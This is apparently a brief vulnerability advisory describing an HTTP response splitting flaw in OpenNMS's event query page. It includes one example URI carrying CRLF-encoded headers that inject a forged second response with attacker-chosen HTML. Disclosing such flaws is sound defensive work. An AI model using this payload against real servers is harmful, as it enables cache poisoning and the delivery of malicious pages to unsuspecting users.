OpenNMS HTTP Response Splitting Vulnerability

info
discussion
exploit
solution
references

OpenNMS HTTP Response Splitting Vulnerability

Attackers can leverage the issue to corrupt a cached version of a page or entice an unsuspecting victim into following a malicious URI.

The following example URI is available:

http://www.example.com/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text
/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--